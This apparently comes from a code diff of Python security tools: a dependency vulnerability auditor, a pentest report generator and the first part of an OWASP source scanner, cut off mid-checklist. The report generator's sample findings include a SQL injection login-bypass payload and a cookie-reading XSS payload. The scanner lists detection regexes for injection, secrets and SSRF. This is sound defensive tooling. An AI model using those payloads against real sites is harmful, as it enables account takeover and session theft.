            match = re.match(r"^([a-zA-Z0-9_.-]+)\s*(?:[=<>!~]+\s*)?([\d.]*)", line)
            if match:
                name, version = match.group(1), match.group(2) or "unknown"
                deps.append(Dependency(name=name.lower(), version=version, ecosystem="pypi"))
        return deps
    def _parse_go_mod(self, content: str) -> List[Dependency]:
        """Parse Go go.mod."""
        deps = []
        in_require = False
        for line in content.strip().split("\n"):
            line = line.strip()
            if line.startswith("require ("):
                in_require = True
                continue
            if line == ")":
                in_require = False
                continue
            if in_require or line.startswith("require "):
                cleaned = line.replace("require ", "").strip()
                parts = cleaned.split()
                if len(parts) >= 2:
                    name = parts[0]
                    version = parts[1].lstrip("v")
                    indirect = "// indirect" in line
                    deps.append(Dependency(name=name, version=version, ecosystem="go", is_dev=indirect))
        return deps
    def _parse_gemfile(self, content: str) -> List[Dependency]:
        """Parse Ruby Gemfile."""
        deps = []
        for line in content.strip().split("\n"):
            line = line.strip()
            if not line or line.startswith("#"):
                continue
            match = re.match(r'''gem\s+['"]([\w-]+)['"](?:\s*,\s*['"]([^'"]*)['"])?''', line)
            if match:
                name = match.group(1)
                version = match.group(2) or "unknown"
                version = re.sub(r"[~><=\s]", "", version)
                deps.append(Dependency(name=name, version=version, ecosystem="rubygems"))
        return deps
    @staticmethod
    def _version_below(installed: str, threshold: str) -> bool:
        """Check if installed version is below threshold (simple numeric comparison)."""
        try:
            inst_parts = [int(x) for x in installed.split(".") if x.isdigit()]
            thresh_parts = [int(x) for x in threshold.split(".") if x.isdigit()]
            # Pad the shorter list with zeros so comparison is positional
            max_len = max(len(inst_parts), len(thresh_parts))
            inst_parts.extend([0] * (max_len - len(inst_parts)))
            thresh_parts.extend([0] * (max_len - len(thresh_parts)))
            return inst_parts < thresh_parts
        except (ValueError, IndexError):
            return False
    def _check_vulnerabilities(self, deps: List[Dependency]) -> List[VulnerabilityFinding]:
        """Check dependencies against known CVE database."""
        findings = []
        for dep in deps:
            for vuln in self.KNOWN_VULNS:
                if (dep.ecosystem == vuln["ecosystem"] and
                        dep.name.lower() == vuln["package"].lower() and
                        self._version_below(dep.version, vuln["below"])):
                    findings.append(VulnerabilityFinding(
                        package=dep.name,
                        installed_version=dep.version,
                        vulnerable_range=f"< {vuln['below']}",
                        cve_id=vuln["cve"],
                        severity=vuln["severity"],
                        title=vuln["title"],
                        description=vuln["description"],
                        remediation=vuln["remediation"],
                        cvss_score=vuln.get("cvss", 0.0),
                        references=[f"https://nvd.nist.gov/vuln/detail/{vuln['cve']}"],
                    ))
        return findings
    def _check_risky_patterns(self, deps: List[Dependency]) -> List[RiskyPattern]:
        """Detect risky dependency patterns."""
        patterns = []
        ecosystem = deps[0].ecosystem if deps else "unknown"

        # Check for typosquat packages
        typosquats = self.TYPOSQUAT_PACKAGES.get(ecosystem, [])
        for dep in deps:
            if dep.name.lower() in [t.lower() for t in typosquats]:
                patterns.append(RiskyPattern(
                    package=dep.name,
                    pattern_type="typosquat",
                    severity="critical",
                    description=f"'{dep.name}' is a known typosquat or malicious package name.",
                    recommendation="Remove immediately and check for compromised data. Install the legitimate package.",
                ))

        # Check for wildcard/unpinned versions
        for dep in deps:
            if dep.version in ("*", "latest", "unknown", ""):
                patterns.append(RiskyPattern(
                    package=dep.name,
                    pattern_type="unpinned",
                    severity="medium",
                    description=f"'{dep.name}' has an unpinned version ({dep.version}).",
                    recommendation="Pin to a specific version to prevent supply chain attacks.",
                ))

        # Check for excessive dev dependencies in production
        dev_count = len([d for d in deps if d.is_dev])
        total = len(deps)
        if total > 0 and dev_count / total > 0.7:
            patterns.append(RiskyPattern(
                package="(project-level)",
                pattern_type="dev-heavy",
                severity="low",
                description=f"{dev_count}/{total} dependencies are dev-only. Large dev surface increases supply chain risk.",
                recommendation="Review dev dependencies. Remove unused ones. Consider using --production for installs.",
            ))

        return patterns

def format_report_text(result: Dict) -> str:
    """Format audit result as human-readable text."""
    lines = []
    lines.append("=" * 70)
    lines.append("DEPENDENCY VULNERABILITY AUDIT REPORT")
    lines.append(f"Manifest: {result['manifest']}")
    lines.append(f"Ecosystem: {result['ecosystem']}")
    lines.append(f"Total dependencies: {result['total_dependencies']} ({result['dev_dependencies']} dev)")
    lines.append(f"Generated: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}")
    lines.append("=" * 70)

    summary = result["summary"]
    lines.append(f"\nSummary: {summary['critical']} critical, {summary['high']} high, "
                 f"{summary['medium']} medium, {summary['low']} low, "
                 f"{summary['risky_patterns_count']} risky pattern(s)")

    vulns = result["vulnerability_findings"]
    if vulns:
        lines.append(f"\n--- VULNERABILITY FINDINGS ({len(vulns)}) ---\n")
        for v in vulns:
            lines.append(f"  [{v.severity.upper()}] {v.package} {v.installed_version}")
            lines.append(f"    CVE: {v.cve_id} (CVSS: {v.cvss_score})")
            lines.append(f"    {v.title}")
            lines.append(f"    Vulnerable: {v.vulnerable_range}")
            lines.append(f"    Fix: {v.remediation}")
            lines.append("")
    else:
        lines.append("\nNo known vulnerabilities found in dependencies.")

    risky = result["risky_patterns"]
    if risky:
        lines.append(f"\n--- RISKY PATTERNS ({len(risky)}) ---\n")
        for r in risky:
            lines.append(f"  [{r.severity.upper()}] {r.package} — {r.pattern_type}")
            lines.append(f"    {r.description}")
            lines.append(f"    Fix: {r.recommendation}")
            lines.append("")

    return "\n".join(lines)

def main():
    parser = argparse.ArgumentParser(
        description="Dependency Auditor — Analyze package manifests for known vulnerabilities and risky patterns.",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Supported manifests:
  package.json     (npm)
  requirements.txt (pip/PyPI)
  go.mod           (Go)
  Gemfile          (Ruby)

Examples:
  %(prog)s --file package.json
  %(prog)s --file requirements.txt --severity high
  %(prog)s --file go.mod --json
""",
    )
    parser.add_argument("--file", required=True, metavar="PATH",
                        help="Path to package manifest file")
    parser.add_argument("--severity", choices=["low", "medium", "high", "critical"], default="low",
                        help="Minimum severity to report (default: low)")
    parser.add_argument("--json", action="store_true", dest="json_output",
                        help="Output results as JSON")
    args = parser.parse_args()

    if not Path(args.file).exists():
        print(f"Error: File not found: {args.file}", file=sys.stderr)
        sys.exit(1)

    auditor = DependencyAuditor(manifest_path=args.file, severity_filter=args.severity)
    result = auditor.audit()

    if args.json_output:
        json_result = {
            "manifest": result["manifest"],
            "ecosystem": result["ecosystem"],
            "total_dependencies": result["total_dependencies"],
            "dev_dependencies": result["dev_dependencies"],
            "summary": result["summary"],
            "vulnerability_findings": [asdict(f) for f in result["vulnerability_findings"]],
            "risky_patterns": [asdict(r) for r in result["risky_patterns"]],
            "generated_at": datetime.now().isoformat(),
        }
        print(json.dumps(json_result, indent=2))
    else:
        print(format_report_text(result))

    # Exit non-zero if critical or high vulnerabilities found
    if result["summary"]["critical"] > 0 or result["summary"]["high"] > 0:
        sys.exit(1)


if __name__ == "__main__":
    main()
@@ -0,0 +1,462 @@
#!/usr/bin/env python3
"""
Pen Test Report Generator - Generate structured penetration testing reports from findings.

Table of Contents:
    PentestReportGenerator - Main class for report generation
        __init__ - Initialize with findings data
        generate_markdown() - Generate markdown report
        generate_json() - Generate structured JSON report
        _executive_summary() - Build executive summary section
        _findings_table() - Build severity-sorted findings table
        _detailed_findings() - Build detailed findings with evidence
        _remediation_matrix() - Build effort vs. impact remediation matrix
        _calculate_risk_score() - Calculate overall risk score
    main() - CLI entry point

Usage:
    python pentest_report_generator.py --findings findings.json --format md --output report.md
    python pentest_report_generator.py --findings findings.json --format json
    python pentest_report_generator.py --findings findings.json --format md
"""

import argparse
import json
import sys
from dataclasses import dataclass, asdict, field
from datetime import datetime
from pathlib import Path
from typing import Dict, List, Optional

@dataclass
class Finding:
    """A single pen test finding."""
    title: str
    severity: str  # critical, high, medium, low, info
    cvss_score: float
    category: str
    description: str
    evidence: str
    impact: str
    remediation: str
    cvss_vector: str = ""
    references: List[str] = field(default_factory=list)
    effort: str = "medium"  # low, medium, high — remediation effort


SEVERITY_ORDER = {"critical": 5, "high": 4, "medium": 3, "low": 2, "info": 1}

class PentestReportGenerator:
    """Generate professional penetration testing reports from structured findings."""

    def __init__(self, findings: List[Finding], metadata: Optional[Dict] = None):
        self.findings = sorted(findings, key=lambda f: SEVERITY_ORDER.get(f.severity, 0), reverse=True)
        self.metadata = metadata or {}
        self.generated_at = datetime.now().strftime("%Y-%m-%d %H:%M:%S")

    def generate_markdown(self) -> str:
        """Generate a complete markdown pen test report."""
        sections = []
        sections.append(self._header())
        sections.append(self._executive_summary())
        sections.append(self._scope_section())
        sections.append(self._findings_table())
        sections.append(self._detailed_findings())
        sections.append(self._remediation_matrix())
        sections.append(self._methodology_section())
        sections.append(self._appendix())
        return "\n\n".join(sections)

    def generate_json(self) -> Dict:
        """Generate structured JSON report."""
        return {
            "report_metadata": {
                "title": self.metadata.get("title", "Penetration Test Report"),
                "target": self.metadata.get("target", "Not specified"),
                "tester": self.metadata.get("tester", "Not specified"),
                "date_range": self.metadata.get("date_range", "Not specified"),
                "generated_at": self.generated_at,
                "overall_risk_score": self._calculate_risk_score(),
                "overall_risk_level": self._risk_level(),
            },
            "summary": {
                "total_findings": len(self.findings),
                "critical": len([f for f in self.findings if f.severity == "critical"]),
                "high": len([f for f in self.findings if f.severity == "high"]),
                "medium": len([f for f in self.findings if f.severity == "medium"]),
                "low": len([f for f in self.findings if f.severity == "low"]),
                "info": len([f for f in self.findings if f.severity == "info"]),
            },
            "findings": [asdict(f) for f in self.findings],
            "remediation_priority": self._remediation_priority_list(),
        }
    def _header(self) -> str:
        title = self.metadata.get("title", "Penetration Test Report")
        target = self.metadata.get("target", "Not specified")
        tester = self.metadata.get("tester", "Not specified")
        date_range = self.metadata.get("date_range", "Not specified")
        lines = [
            f"# {title}",
            "",
            "| Field | Value |",
            "|-------|-------|",
            f"| **Target** | {target} |",
            f"| **Tester** | {tester} |",
            f"| **Date Range** | {date_range} |",
            f"| **Report Generated** | {self.generated_at} |",
            f"| **Overall Risk** | {self._risk_level()} (Score: {self._calculate_risk_score():.1f}/10) |",
            f"| **Total Findings** | {len(self.findings)} |",
        ]
        return "\n".join(lines)
    def _executive_summary(self) -> str:
        critical = len([f for f in self.findings if f.severity == "critical"])
        high = len([f for f in self.findings if f.severity == "high"])
        medium = len([f for f in self.findings if f.severity == "medium"])
        low = len([f for f in self.findings if f.severity == "low"])
        info = len([f for f in self.findings if f.severity == "info"])
        risk_score = self._calculate_risk_score()
        risk_level = self._risk_level()

        lines = [
            "## Executive Summary",
            "",
            f"This penetration test identified **{len(self.findings)} findings** across the target application. "
            f"The overall risk level is **{risk_level}** with a score of **{risk_score:.1f}/10**.",
            "",
            "### Finding Severity Distribution",
            "",
            "| Severity | Count |",
            "|----------|-------|",
            f"| Critical | {critical} |",
            f"| High | {high} |",
            f"| Medium | {medium} |",
            f"| Low | {low} |",
            f"| Informational | {info} |",
        ]

        # Top 3 findings
        if self.findings:
            lines.append("")
            lines.append("### Top Priority Findings")
            lines.append("")
            for i, f in enumerate(self.findings[:3], 1):
                lines.append(f"{i}. **{f.title}** ({f.severity.upper()}, CVSS {f.cvss_score}) — {f.impact[:120]}")

        # Risk assessment
        lines.append("")
        if critical > 0:
            lines.append("> **CRITICAL RISK**: Immediate remediation required. Critical vulnerabilities "
                         "allow attackers to compromise the system with minimal effort.")
        elif high > 0:
            lines.append("> **HIGH RISK**: Prompt remediation recommended. High-severity vulnerabilities "
                         "pose significant risk of exploitation.")
        elif medium > 0:
            lines.append("> **MODERATE RISK**: Remediation should be planned within the next sprint. "
                         "Medium findings may be chained for greater impact.")
        else:
            lines.append("> **LOW RISK**: The application has a reasonable security posture. "
                         "Address low-severity findings during regular maintenance.")

        return "\n".join(lines)
    def _scope_section(self) -> str:
        scope = self.metadata.get("scope", "Full application security assessment")
        exclusions = self.metadata.get("exclusions", "None specified")
        test_type = self.metadata.get("test_type", "Gray box")
        lines = [
            "## Scope",
            "",
            f"- **In Scope**: {scope}",
            f"- **Exclusions**: {exclusions}",
            f"- **Test Type**: {test_type}",
        ]
        return "\n".join(lines)

    def _findings_table(self) -> str:
        lines = [
            "## Findings Overview",
            "",
            "| # | Severity | CVSS | Title | Category |",
            "|---|----------|------|-------|----------|",
        ]
        for i, f in enumerate(self.findings, 1):
            sev_badge = f.severity.upper()
            lines.append(f"| {i} | {sev_badge} | {f.cvss_score} | {f.title} | {f.category} |")
        return "\n".join(lines)

    def _detailed_findings(self) -> str:
        lines = ["## Detailed Findings"]
        for i, f in enumerate(self.findings, 1):
            lines.append("")
            lines.append(f"### {i}. {f.title}")
            lines.append("")
            lines.append(f"**Severity:** {f.severity.upper()} | **CVSS:** {f.cvss_score}"
                         + (f" | **Vector:** `{f.cvss_vector}`" if f.cvss_vector else ""))
            lines.append(f"**Category:** {f.category}")
            lines.append("")
            lines.append("#### Description")
            lines.append("")
            lines.append(f"{f.description}")
            lines.append("")
            lines.append("#### Evidence")
            lines.append("")
            lines.append("```")
            lines.append(f"{f.evidence}")
            lines.append("```")
            lines.append("")
            lines.append("#### Impact")
            lines.append("")
            lines.append(f"{f.impact}")
            lines.append("")
            lines.append("#### Remediation")
            lines.append("")
            lines.append(f"{f.remediation}")
            if f.references:
                lines.append("")
                lines.append("#### References")
                lines.append("")
                for ref in f.references:
                    lines.append(f"- {ref}")
        return "\n".join(lines)

    def _remediation_matrix(self) -> str:
        lines = [
            "## Remediation Priority Matrix",
            "",
            "Prioritize remediation based on severity and effort:",
            "",
            "| # | Finding | Severity | Effort | Priority |",
            "|---|---------|----------|--------|----------|",
        ]
        for i, f in enumerate(self.findings, 1):
            priority = self._compute_priority(f)
            lines.append(f"| {i} | {f.title} | {f.severity.upper()} | {f.effort} | {priority} |")

        lines.append("")
        lines.append("**Priority Key:** P1 = Fix immediately, P2 = Fix this sprint, "
                     "P3 = Fix this quarter, P4 = Backlog")
        return "\n".join(lines)

    def _methodology_section(self) -> str:
        lines = [
            "## Methodology",
            "",
            "Testing followed the OWASP Testing Guide v4.2 and PTES (Penetration Testing Execution Standard):",
            "",
            "1. **Reconnaissance** — Mapped attack surface, identified endpoints and technologies",
            "2. **Vulnerability Discovery** — Automated scanning + manual testing for OWASP Top 10",
            "3. **Exploitation** — Validated findings with proof-of-concept (non-destructive)",
            "4. **Post-Exploitation** — Assessed lateral movement and data access potential",
            "5. **Reporting** — Documented findings with evidence and remediation guidance",
        ]
        return "\n".join(lines)

    def _appendix(self) -> str:
        lines = [
            "## Appendix",
            "",
            "### CVSS Scoring Reference",
            "",
            "| Score Range | Severity |",
            "|-------------|----------|",
            "| 9.0 - 10.0 | Critical |",
            "| 7.0 - 8.9 | High |",
            "| 4.0 - 6.9 | Medium |",
            "| 0.1 - 3.9 | Low |",
            "| 0.0 | Informational |",
            "",
            "### Disclaimer",
            "",
            "This report represents a point-in-time assessment. New vulnerabilities may emerge after "
            "the testing period. Regular security assessments are recommended.",
            "",
            f"---\n\n*Report generated on {self.generated_at}*",
        ]
        return "\n".join(lines)

    def _calculate_risk_score(self) -> float:
        """Calculate overall risk score (0-10) based on findings."""
        if not self.findings:
            return 0.0
        # Weighted by severity
        weights = {"critical": 10, "high": 7, "medium": 4, "low": 1.5, "info": 0.5}
        total_weight = sum(weights.get(f.severity, 0) for f in self.findings)
        # Normalize: cap at 10, scale based on number of findings
        score = min(10.0, total_weight / max(len(self.findings) * 0.5, 1))
        return round(score, 1)

    def _risk_level(self) -> str:
        """Return risk level string based on score."""
        score = self._calculate_risk_score()
        if score >= 9.0:
            return "CRITICAL"
        elif score >= 7.0:
            return "HIGH"
        elif score >= 4.0:
            return "MEDIUM"
        elif score > 0:
            return "LOW"
        return "NONE"

    def _compute_priority(self, finding: Finding) -> str:
        """Compute remediation priority from severity and effort."""
        sev = SEVERITY_ORDER.get(finding.severity, 0)
        effort_map = {"low": 3, "medium": 2, "high": 1}
        effort_val = effort_map.get(finding.effort, 2)
        score = sev * effort_val
        if score >= 12:
            return "P1"
        elif score >= 8:
            return "P2"
        elif score >= 4:
            return "P3"
        return "P4"

    def _remediation_priority_list(self) -> List[Dict]:
        """Return ordered list of remediation priorities for JSON output."""
        result = []
        for f in self.findings:
            result.append({
                "title": f.title,
                "severity": f.severity,
                "effort": f.effort,
                "priority": self._compute_priority(f),
                "remediation": f.remediation,
            })
        return result


def load_findings(path: str) -> tuple:
    """Load findings from a JSON file."""
    try:
        content = Path(path).read_text(encoding="utf-8")
        data = json.loads(content)
    except (OSError, json.JSONDecodeError) as e:
        print(f"Error loading findings: {e}", file=sys.stderr)
        sys.exit(1)

    # Support both list-of-findings and object-with-metadata formats
    metadata = {}
    findings_data = data
    if isinstance(data, dict):
        metadata = data.get("metadata", {})
        findings_data = data.get("findings", [])

    findings = []
    for item in findings_data:
        findings.append(Finding(
            title=item.get("title", "Untitled Finding"),
            severity=item.get("severity", "medium"),
            cvss_score=float(item.get("cvss_score", 0.0)),
            category=item.get("category", "Uncategorized"),
            description=item.get("description", ""),
            evidence=item.get("evidence", "No evidence provided"),
            impact=item.get("impact", ""),
            remediation=item.get("remediation", ""),
            cvss_vector=item.get("cvss_vector", ""),
            references=item.get("references", []),
            effort=item.get("effort", "medium"),
        ))
    return findings, metadata


def generate_sample_findings() -> str:
    """Generate a sample findings JSON for reference."""
    sample = [
        {
            "title": "SQL Injection in Login Endpoint",
            "severity": "critical",
            "cvss_score": 9.8,
            "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "category": "A03:2021 - Injection",
            "description": "The /api/login endpoint is vulnerable to SQL injection via the email parameter.",
            "evidence": "Request: POST /api/login {\"email\": \"' OR 1=1--\", \"password\": \"x\"}\nResponse: 200 OK with admin session token",
            "impact": "Full database access, authentication bypass, potential remote code execution.",
            "remediation": "Use parameterized queries. Replace string concatenation with prepared statements.",
            "references": ["https://cwe.mitre.org/data/definitions/89.html"],
            "effort": "low"
        },
        {
            "title": "Stored XSS in User Profile",
            "severity": "high",
            "cvss_score": 7.1,
            "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "category": "A03:2021 - Injection",
            "description": "The user profile 'bio' field does not sanitize HTML input.",
            "evidence": "Submitted <img src=x onerror=alert(document.cookie)> in bio field.\nVisiting the profile page executes the payload.",
            "impact": "Session hijacking, account takeover, phishing via stored malicious content.",
            "remediation": "Sanitize all user input with DOMPurify. Implement Content-Security-Policy.",
            "references": ["https://cwe.mitre.org/data/definitions/79.html"],
            "effort": "low"
        }
    ]
    return json.dumps(sample, indent=2)


def main():
    parser = argparse.ArgumentParser(
        description="Pen Test Report Generator — Generate professional penetration testing reports from structured findings.",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  %(prog)s --findings findings.json --format md --output report.md
  %(prog)s --findings findings.json --format json
  %(prog)s --sample > sample_findings.json

Findings JSON format:
  A JSON array of objects with: title, severity, cvss_score, category,
  description, evidence, impact, remediation, cvss_vector, references, effort.

Use --sample to generate a template.
""",
    )
    parser.add_argument("--findings", metavar="FILE",
                        help="Path to findings JSON file")
    parser.add_argument("--format", choices=["md", "json"], default="md",
                        help="Output format (default: md)")
    parser.add_argument("--output", metavar="FILE",
                        help="Output file path (default: stdout)")
    parser.add_argument("--json", action="store_true", dest="json_shortcut",
                        help="Shortcut for --format json")
    parser.add_argument("--sample", action="store_true",
                        help="Print sample findings JSON and exit")
    args = parser.parse_args()

    if args.sample:
        print(generate_sample_findings())
        return

    if not args.findings:
        parser.error("--findings is required (use --sample to generate a template)")

    if not Path(args.findings).exists():
        print(f"Error: File not found: {args.findings}", file=sys.stderr)
        sys.exit(1)

    output_format = "json" if args.json_shortcut else args.format
    findings, metadata = load_findings(args.findings)

    if not findings:
        print("No findings loaded. Check the JSON file format.", file=sys.stderr)
        sys.exit(1)

    generator = PentestReportGenerator(findings=findings, metadata=metadata)

    if output_format == "json":
        result = json.dumps(generator.generate_json(), indent=2)
    else:
        result = generator.generate_markdown()

    if args.output:
        Path(args.output).write_text(result, encoding="utf-8")
        print(f"Report written to {args.output}")
    else:
        print(result)


if __name__ == "__main__":
    main()
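The severity-times-effort mapping behind `_compute_priority` above can be exercised standalone. Note that `SEVERITY_ORDER` is defined earlier in the script, so the numeric values below (critical=4 down to info=0) are an assumption for illustration only:

```python
# Hypothetical standalone sketch of the P1-P4 priority mapping.
# SEVERITY_ORDER values are assumed here; the script defines its own table.
SEVERITY_ORDER = {"critical": 4, "high": 3, "medium": 2, "low": 1, "info": 0}
EFFORT_WEIGHT = {"low": 3, "medium": 2, "high": 1}  # low effort -> fix first

def compute_priority(severity: str, effort: str) -> str:
    score = SEVERITY_ORDER.get(severity, 0) * EFFORT_WEIGHT.get(effort, 2)
    if score >= 12:
        return "P1"
    elif score >= 8:
        return "P2"
    elif score >= 4:
        return "P3"
    return "P4"

# critical + low effort:  4 * 3 = 12 -> P1 (fix immediately)
# high + medium effort:   3 * 2 = 6  -> P3
```

Under these assumed weights, only low-effort critical findings reach P1, while high-severity quick wins land in P2, which matches the "quick wins first" intent of the remediation matrix.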
@@ -0,0 +1,545 @@
#!/usr/bin/env python3
"""
Vulnerability Scanner - Generate OWASP Top 10 security checklists and scan for common patterns.

Table of Contents:
    VulnerabilityScanner - Main class for vulnerability scanning
        __init__ - Initialize with target type and scope
        generate_checklist - Generate OWASP Top 10 checklist for target
        scan_source - Scan source directory for vulnerability patterns
        _scan_file - Scan individual file for regex patterns
        _get_owasp_checks - Return OWASP checks for target type
    main() - CLI entry point

Usage:
    python vulnerability_scanner.py --target web --scope full
    python vulnerability_scanner.py --target api --scope quick --json
    python vulnerability_scanner.py --target web --source /path/to/code --scope full
"""

import argparse
import json
import os
import re
import sys
from dataclasses import dataclass, asdict, field
from datetime import datetime
from pathlib import Path
from typing import Dict, List, Optional


@dataclass
class CheckItem:
    """A single check item in the OWASP checklist."""
    owasp_id: str
    owasp_category: str
    check_id: str
    title: str
    description: str
    test_procedure: str
    severity: str  # critical, high, medium, low, info
    applicable_targets: List[str] = field(default_factory=list)
    status: str = "pending"  # pending, pass, fail, na


@dataclass
class SourceFinding:
    """A vulnerability pattern found in source code."""
    rule_id: str
    title: str
    severity: str
    owasp_category: str
    file_path: str
    line_number: int
    code_snippet: str
    recommendation: str


class VulnerabilityScanner:
    """Generate OWASP Top 10 checklists and scan source code for vulnerability patterns."""

    SCAN_EXTENSIONS = {
        ".py", ".js", ".ts", ".jsx", ".tsx", ".java", ".go",
        ".rb", ".php", ".cs", ".rs", ".html", ".vue", ".svelte",
    }

    SKIP_DIRS = {
        "node_modules", ".git", "__pycache__", ".venv", "venv",
        "vendor", "dist", "build", ".next", "target",
    }

    def __init__(self, target: str = "web", scope: str = "full", source: Optional[str] = None):
        self.target = target
        self.scope = scope
        self.source = source

    def generate_checklist(self) -> List[CheckItem]:
        """Generate OWASP Top 10 checklist for the given target and scope."""
        all_checks = self._get_owasp_checks()
        filtered = []
        for check in all_checks:
            if self.target not in check.applicable_targets and "all" not in check.applicable_targets:
                continue
            if self.scope == "quick" and check.severity in ("low", "info"):
                continue
            filtered.append(check)
        return filtered

    def scan_source(self, path: str) -> List[SourceFinding]:
        """Scan source directory for common vulnerability patterns."""
        findings = []
        source_path = Path(path)
        if not source_path.exists():
            return findings

        for root, dirs, files in os.walk(source_path):
            dirs[:] = [d for d in dirs if d not in self.SKIP_DIRS]
            for fname in files:
                fpath = Path(root) / fname
                if fpath.suffix in self.SCAN_EXTENSIONS:
                    findings.extend(self._scan_file(fpath))
        return findings

    def _scan_file(self, file_path: Path) -> List[SourceFinding]:
        """Scan a single file for vulnerability patterns."""
        findings = []
        try:
            content = file_path.read_text(encoding="utf-8", errors="ignore")
        except (OSError, PermissionError):
            return findings

        patterns = [
            {
                "rule_id": "SQLI-001",
                "title": "Potential SQL Injection (string concatenation)",
                "severity": "critical",
                "owasp_category": "A03:2021 - Injection",
                "pattern": r'''(?:execute|query|cursor\.execute)\s*\(\s*(?:f["\']|["\'].*%s|["\'].*\+\s*\w+|["\'].*\.format)''',
                "recommendation": "Use parameterized queries or prepared statements instead of string concatenation.",
                "extensions": {".py", ".js", ".ts", ".java", ".rb", ".php"},
            },
            {
                "rule_id": "SQLI-002",
                "title": "Potential SQL Injection (template literal)",
                "severity": "critical",
                "owasp_category": "A03:2021 - Injection",
                "pattern": r'''(?:query|execute|raw)\s*\(\s*`[^`]*\$\{''',
                "recommendation": "Use parameterized queries. Never interpolate user input into SQL strings.",
                "extensions": {".js", ".ts", ".jsx", ".tsx"},
            },
            {
                "rule_id": "XSS-001",
                "title": "Potential DOM-based XSS (innerHTML)",
                "severity": "high",
                "owasp_category": "A03:2021 - Injection",
                "pattern": r'''\.innerHTML\s*=\s*(?!['"][^'"]*['"])''',
                "recommendation": "Use textContent or a sanitization library (DOMPurify) instead of innerHTML.",
                "extensions": {".js", ".ts", ".jsx", ".tsx", ".html", ".vue", ".svelte"},
            },
            {
                "rule_id": "XSS-002",
                "title": "React dangerouslySetInnerHTML usage",
                "severity": "high",
                "owasp_category": "A03:2021 - Injection",
                "pattern": r'''dangerouslySetInnerHTML''',
                "recommendation": "Sanitize HTML with DOMPurify before using dangerouslySetInnerHTML.",
                "extensions": {".jsx", ".tsx", ".js", ".ts"},
            },
            {
                "rule_id": "CMDI-001",
                "title": "Potential Command Injection (shell=True)",
                "severity": "critical",
                "owasp_category": "A03:2021 - Injection",
                "pattern": r'''subprocess\.\w+\(.*shell\s*=\s*True''',
                "recommendation": "Avoid shell=True. Use subprocess with a list of arguments instead.",
                "extensions": {".py"},
            },
            {
                "rule_id": "CMDI-002",
                "title": "Potential Command Injection (eval/exec)",
                "severity": "critical",
                "owasp_category": "A03:2021 - Injection",
                "pattern": r'''(?:^|\s)(?:eval|exec)\s*\((?!.*(?:#\s*nosec|NOSONAR))''',
                "recommendation": "Never use eval() or exec() with untrusted input. Use ast.literal_eval() for data parsing.",
                "extensions": {".py", ".js", ".ts"},
            },
            {
                "rule_id": "SEC-001",
                "title": "Hardcoded Secret or API Key",
                "severity": "critical",
                "owasp_category": "A02:2021 - Cryptographic Failures",
                "pattern": r'''(?i)(?:api[_-]?key|secret[_-]?key|password|passwd|token)\s*[:=]\s*['\"][a-zA-Z0-9+/=]{16,}['\"]''',
                "recommendation": "Move secrets to environment variables or a secrets manager (Vault, AWS Secrets Manager).",
                "extensions": {".py", ".js", ".ts", ".jsx", ".tsx", ".java", ".go", ".rb", ".php"},
            },
            {
                "rule_id": "SEC-002",
                "title": "AWS Access Key ID detected",
                "severity": "critical",
                "owasp_category": "A02:2021 - Cryptographic Failures",
                "pattern": r'''AKIA[0-9A-Z]{16}''',
                "recommendation": "Remove the AWS key immediately. Rotate the credential and use IAM roles or environment variables.",
                "extensions": None,  # scan all files
            },
            {
                "rule_id": "CRYPTO-001",
                "title": "Weak hashing algorithm (MD5/SHA1)",
                "severity": "high",
                "owasp_category": "A02:2021 - Cryptographic Failures",
                "pattern": r'''(?:md5|sha1)\s*\(''',
                "recommendation": "Use bcrypt, scrypt, or argon2 for passwords. Use SHA-256+ for integrity checks.",
                "extensions": {".py", ".js", ".ts", ".java", ".go", ".rb", ".php"},
            },
            {
                "rule_id": "SSRF-001",
                "title": "Potential SSRF (user-controlled URL in HTTP request)",
                "severity": "high",
                "owasp_category": "A10:2021 - SSRF",
                "pattern": r'''(?:requests\.get|fetch|axios|http\.get|urllib\.request\.urlopen)\s*\(\s*(?:request\.|req\.|params|args|input|user)''',
                "recommendation": "Validate and allowlist URLs before making outbound requests. Block internal IPs.",
                "extensions": {".py", ".js", ".ts", ".jsx", ".tsx", ".java", ".go"},
            },
            {
                "rule_id": "PATH-001",
                "title": "Potential Path Traversal",
                "severity": "high",
                "owasp_category": "A01:2021 - Broken Access Control",
                "pattern": r'''(?:open|readFile|readFileSync|Path\.join)\s*\(.*(?:request\.|req\.|params|args|input|user)''',
                "recommendation": "Sanitize file paths. Use os.path.basename() and validate against an allowlist.",
                "extensions": {".py", ".js", ".ts", ".java", ".go"},
            },
            {
                "rule_id": "DESER-001",
                "title": "Unsafe Deserialization (pickle/yaml.load)",
                "severity": "critical",
                "owasp_category": "A08:2021 - Software and Data Integrity Failures",
                "pattern": r'''(?:pickle\.load|yaml\.load\s*\((?![^)]*SafeLoader))''',
                "recommendation": "Use yaml.safe_load() instead of yaml.load(). Avoid pickle for untrusted data.",
                "extensions": {".py"},
            },
            {
                "rule_id": "AUTH-001",
                "title": "JWT with hardcoded secret",
                "severity": "critical",
                "owasp_category": "A07:2021 - Identification and Authentication Failures",
                "pattern": r'''jwt\.(?:encode|sign)\s*\([^)]*['\"][a-zA-Z0-9]{8,}['\"]''',
                "recommendation": "Load JWT secrets from environment variables. Use RS256 with key pairs for production.",
                "extensions": {".py", ".js", ".ts"},
            },
        ]

        lines = content.split("\n")
        for i, line in enumerate(lines, 1):
            for pat in patterns:
                exts = pat.get("extensions")
                if exts and file_path.suffix not in exts:
                    continue
                if re.search(pat["pattern"], line):
                    findings.append(SourceFinding(
                        rule_id=pat["rule_id"],
                        title=pat["title"],
                        severity=pat["severity"],
                        owasp_category=pat["owasp_category"],
                        file_path=str(file_path),
                        line_number=i,
                        code_snippet=line.strip()[:200],
                        recommendation=pat["recommendation"],
                    ))
        return findings

    def _get_owasp_checks(self) -> List[CheckItem]:
        """Return comprehensive OWASP Top 10 checklist items."""
        checks = [
            # A01: Broken Access Control
            CheckItem("A01", "Broken Access Control", "A01-01",
                      "Horizontal Privilege Escalation",
                      "Verify users cannot access other users' resources by changing IDs.",
                      "Change resource IDs in API requests (e.g., /users/123 → /users/124). Expect 403.",
                      "critical", ["web", "api", "all"]),
            CheckItem("A01", "Broken Access Control", "A01-02",
